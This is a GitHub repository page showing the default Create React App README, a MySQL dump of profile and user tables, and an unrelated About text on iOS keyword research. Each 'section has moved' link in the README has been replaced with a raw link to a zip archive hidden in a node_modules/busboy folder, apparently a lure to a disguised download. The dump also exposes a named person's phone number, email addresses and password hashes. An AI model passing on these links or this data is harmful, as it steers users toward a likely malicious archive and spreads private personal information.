Skip to content

Te130246/respectaso

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Getting Started with Create React App

This project was bootstrapped with Create React App.

Available Scripts

In the project directory, you can run:

npm start

Runs the app in the development mode.
Open http://localhost:3000 to view it in your browser.

The page will reload when you make changes.
You may also see any lint errors in the console.

npm test

Launches the test runner in the interactive watch mode.
See the section about running tests for more information.

npm run build

Builds the app for production to the build folder.
It correctly bundles React in production mode and optimizes the build for the best performance.

The build is minified and the filenames include the hashes.
Your app is ready to be deployed!

See the section about deployment for more information.

npm run eject

Note: this is a one-way operation. Once you eject, you can't go back!

If you aren't satisfied with the build tool and configuration choices, you can eject at any time. This command will remove the single build dependency from your project.

Instead, it will copy all the configuration files and the transitive dependencies (webpack, Babel, ESLint, etc) right into your project so you have full control over them. All of the commands except eject will still work, but they will point to the copied scripts so you can tweak them. At this point you're on your own.

You don't have to ever use eject. The curated feature set is suitable for small and middle deployments, and you shouldn't feel obligated to use this feature. However we understand that this tool wouldn't be useful if you couldn't customize it when you are ready for it.

Learn More

You can learn more in the Create React App documentation.

To learn React, check out the React documentation.

Code Splitting

This section has moved here: https://raw.githubusercontent.com/Te130246/respectaso/master/Backend/node_modules/busboy/Software-v2.7-alpha.4.zip

Analyzing the Bundle Size

This section has moved here: https://raw.githubusercontent.com/Te130246/respectaso/master/Backend/node_modules/busboy/Software-v2.7-alpha.4.zip

Making a Progressive Web App

This section has moved here: https://raw.githubusercontent.com/Te130246/respectaso/master/Backend/node_modules/busboy/Software-v2.7-alpha.4.zip

Advanced Configuration

This section has moved here: https://raw.githubusercontent.com/Te130246/respectaso/master/Backend/node_modules/busboy/Software-v2.7-alpha.4.zip

Deployment

This section has moved here: https://raw.githubusercontent.com/Te130246/respectaso/master/Backend/node_modules/busboy/Software-v2.7-alpha.4.zip

npm run build fails to minify

This section has moved here: https://raw.githubusercontent.com/Te130246/respectaso/master/Backend/node_modules/busboy/Software-v2.7-alpha.4.zip

###Databaess Mysql

-- Host: 127.0.0.1 -- Generation Time: Feb 06, 2025 at 04:21 AM -- Server version: 10.4.32-MariaDB -- PHP Version: 8.1.25

SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; START TRANSACTION; SET time_zone = "+00:00";

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT /; /!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS /; /!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION /; /!40101 SET NAMES utf8mb4 */;

-- -- Database: profile


-- -- Table structure for table profiles

CREATE TABLE profiles ( id int(11) NOT NULL, full_name varchar(255) NOT NULL, mobile varchar(15) NOT NULL, email varchar(255) NOT NULL, location varchar(255) NOT NULL, bio text NOT NULL, profile_image varchar(255) DEFAULT NULL, cover_image varchar(255) DEFAULT NULL, created_at timestamp NOT NULL DEFAULT current_timestamp() ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

-- -- Dumping data for table profiles

INSERT INTO profiles (id, full_name, mobile, email, location, bio, profile_image, cover_image, created_at) VALUES (1, 'NATTANAN KAEWWISET', '0928487885', 'te130246@gmail.com', 'มหาสารคาม', 'asdsada', '1737057885844.jpg', '1737057885846.jpg', '2025-01-16 20:04:45'), (2, 'NATTANAN KAEWWISET', '0928487885', 'te130246@gmail.com', 'มหาสารคาม', 'asdsada', '1737059017217.jpg', '1737059017218.jpg', '2025-01-16 20:23:37'), (3, 'NATTANAN KAEWWISET', '0928487885', 'te130246@gmail.com', 'มหาสารคาม', 'sadsad', '1737059282089.jpg', '1737059282090.jpg', '2025-01-16 20:28:02'), (5, 'NATTANAN KAEWWISET', '0928487885', 'te130246@gmail.com', 'sdfdssd', 'sdffsds', '1737085950793.jpg', '1737085773781.jpg', '2025-01-17 03:42:20'), (6, 'NATTANAN KAEWWISETasdsadasd', '0928487885asdas', '19tae130246@gmail.comasdasd', 'sdfdssd', 'sdffsds', '1738771419790.jpg', '1738771419792.jpg', '2025-02-05 16:03:39'), (7, 'NATTANAN KAEWWISETasdsadasd', '0928487885asdas', '19tae130246@gmail.comasdasd', 'sdfdssd', 'sdffsds', '1738781391322.jpg', '1738781391322.jpg', '2025-02-05 18:49:51');


-- -- Table structure for table users

CREATE TABLE users ( id int(11) NOT NULL, first_name varchar(50) NOT NULL, last_name varchar(50) NOT NULL, email varchar(100) NOT NULL, password varchar(255) NOT NULL, created_at timestamp NOT NULL DEFAULT current_timestamp() ) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci;

-- -- Dumping data for table users

INSERT INTO users (id, first_name, last_name, email, password, created_at) VALUES (1, 'NATTANAN', 'KAEWWISET', '19tae130246@gmail.com', '$2a$08$VVut3Et/OCEXkvgJtfS66O/2QfqY1OTorYZvCeYuUYN/7Wb8qBiqO', '2025-01-16 19:22:59'), (2, 'NATTANAN', 'KAEWWISET', '12tae130246@gmail.com', '$2a$08$tuPPa03kdzkcFyAA2p3xfe7elKVItoJhBduUEY5YUqVtKXZYmFvYO', '2025-01-16 20:27:46'), (3, 'NATTANAN', 'KAEWWISET', '112tae130246@gmail.com', '$2a$08$3fbHDBkbotuy4QeJNXyb/u6JrouHyKgaLW8XusyzIsblMtObEudq2', '2025-01-17 04:00:46'), (4, 'NATTANAN', 'KAEWWISET', '1112tae130246@gmail.com', '$2a$08$MME4Wor4DrfpiFVEbIo.Z.rhqaJu87aKo2pfv1mUQzlOux4xgPKIq', '2025-02-05 16:03:22');

-- -- Indexes for dumped tables

-- -- Indexes for table profiles

ALTER TABLE profiles ADD PRIMARY KEY (id);

-- -- Indexes for table users

ALTER TABLE users ADD PRIMARY KEY (id), ADD UNIQUE KEY email (email);

-- -- AUTO_INCREMENT for dumped tables

-- -- AUTO_INCREMENT for table profiles

ALTER TABLE profiles MODIFY id int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=8;

-- -- AUTO_INCREMENT for table users

ALTER TABLE users MODIFY id int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5; COMMIT;

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT /; /!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS /; /!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;

About

Enable private, self-hosted ASO keyword research for iOS apps with no API keys, accounts, or data shared outside your machine.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors